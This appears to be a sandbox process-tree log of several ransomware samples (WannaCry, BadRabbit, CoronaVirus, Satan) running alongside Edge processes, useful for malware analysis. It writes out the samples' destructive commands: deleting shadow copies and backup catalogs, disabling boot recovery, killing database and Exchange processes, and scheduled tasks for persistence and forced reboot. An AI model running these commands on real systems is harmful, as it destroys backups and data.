C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:83⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=7364,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7332 /prefetch:13⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=5172,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6488 /prefetch:13⤵PID:5268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6280,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:83⤵PID:4308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=7376,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:13⤵PID:3812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6276,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7328 /prefetch:83⤵PID:2844
-
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
PID:3764 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:964
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:1160
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2392
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:772
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:6124
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2236
-
-
-
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3776
-
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"3⤵
- Executes dropped EXE
PID:4872
-
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3704
-
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=4772,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=7248,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=6452,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7244 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5328,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=3728,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7268 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7396,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=6020,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3656,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=6068,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6376 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7580 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7768,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3704 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7760 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7504,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7736 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7808,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7796 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3452,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7256 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7892,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7880 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5000,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7976 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=7400,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6160,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7940 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7760,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7736 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7192,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7516,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8140,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=8156 /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1132
-
-
C:\Users\Admin\Downloads\BadRabbit.exe"C:\Users\Admin\Downloads\BadRabbit.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5508 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 154⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
-
C:\Users\Admin\Downloads\WannaCry (4).exe"C:\Users\Admin\Downloads\WannaCry (4).exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 90741743957787.bat4⤵
- System Location Discovery: System Language Discovery
PID:740 -
C:\Windows\SysWOW64\cscript.execscript //nologo c.vbs5⤵
- System Location Discovery: System Language Discovery
PID:5272
-
-
-
C:\Users\Admin\Downloads\!WannaDecryptor!.exe!WannaDecryptor!.exe f4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MSExchange*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Microsoft.Exchange.*4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlserver.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlwriter.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
C:\Users\Admin\Downloads\!WannaDecryptor!.exe!WannaDecryptor!.exe c4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2272
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b !WannaDecryptor!.exe v4⤵PID:648
-
C:\Users\Admin\Downloads\!WannaDecryptor!.exe!WannaDecryptor!.exe v5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2356 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet6⤵
- System Location Discovery: System Language Discovery
PID:4524 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
-
-
-
-
C:\Users\Admin\Downloads\!WannaDecryptor!.exe!WannaDecryptor!.exe4⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:5568
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=6336,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7832 /prefetch:13⤵
- Checks computer location settings
- Executes dropped EXE
PID:1568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7684,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:83⤵
- Executes dropped EXE
PID:4732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6376,i,3880530741439701898,11591659416169771069,262144 --variations-seed-version --mojo-platform-channel-handle=7436 /prefetch:83⤵
- Executes dropped EXE
PID:1976
-
-
C:\Users\Admin\Downloads\satan.exe"C:\Users\Admin\Downloads\satan.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4376 -
C:\Users\Admin\Downloads\satan.exe"C:\Users\Admin\Downloads\satan.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe"C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1892 -
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe"C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe"6⤵
- Executes dropped EXE
PID:4532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_8656f293.bat"5⤵
- System Location Discovery: System Language Discovery
PID:1108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5900
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:4004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start3⤵PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\system.exe2⤵PID:4220
-
C:\Users\Admin\AppData\Local\system.exeC:\Users\Admin\AppData\Local\system.exe3⤵
- Executes dropped EXE
PID:856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵
- System Location Discovery: System Language Discovery
PID:5148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 18124⤵
- Program crash
PID:2316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\system.exe2⤵PID:2628
-
C:\Users\Admin\AppData\Local\system.exeC:\Users\Admin\AppData\Local\system.exe3⤵
- Executes dropped EXE
PID:1988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵PID:4336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 18204⤵
- Program crash
PID:2536
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\system.exe2⤵PID:3720
-
C:\Users\Admin\AppData\Local\system.exeC:\Users\Admin\AppData\Local\system.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5276 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵
- System Location Discovery: System Language Discovery
PID:3996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 18244⤵
- Program crash
PID:3052
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\CoronaVirus.exe2⤵PID:2632
-
C:\Windows\System32\CoronaVirus.exeC:\Windows\System32\CoronaVirus.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1708
-
-
-
C:\Users\Admin\Downloads\BadRabbit.exe"C:\Users\Admin\Downloads\BadRabbit.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3660 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 153⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3556 -
C:\Windows\SysWOW64\cmd.exe/c schtasks /Delete /F /TN rhaegal4⤵
- System Location Discovery: System Language Discovery
PID:5320 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /F /TN rhaegal5⤵
- System Location Discovery: System Language Discovery
PID:3692
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2190066969 && exit"4⤵
- System Location Discovery: System Language Discovery
PID:2328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2190066969 && exit"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5544
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:00:004⤵
- System Location Discovery: System Language Discovery
PID:1596 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:00:005⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5488
-
-
-
C:\Windows\33F.tmp"C:\Windows\33F.tmp" \\.\pipe\{98C52287-7DA0-4257-8224-9C81FD52D4F7}4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6100
-
-
-
-
C:\Users\Admin\Downloads\BadRabbit.exe"C:\Users\Admin\Downloads\BadRabbit.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5144 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 153⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\WannaCry (4).exe" /r2⤵PID:2948
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3740
-
-
C:\Users\Admin\Downloads\WannaCry (4).exe"C:\Users\Admin\Downloads\WannaCry (4).exe" /r3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5080
-
-
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5972
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3100 -
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵
- Executes dropped EXE
PID:5240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5340
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:224
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5216
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1892
-
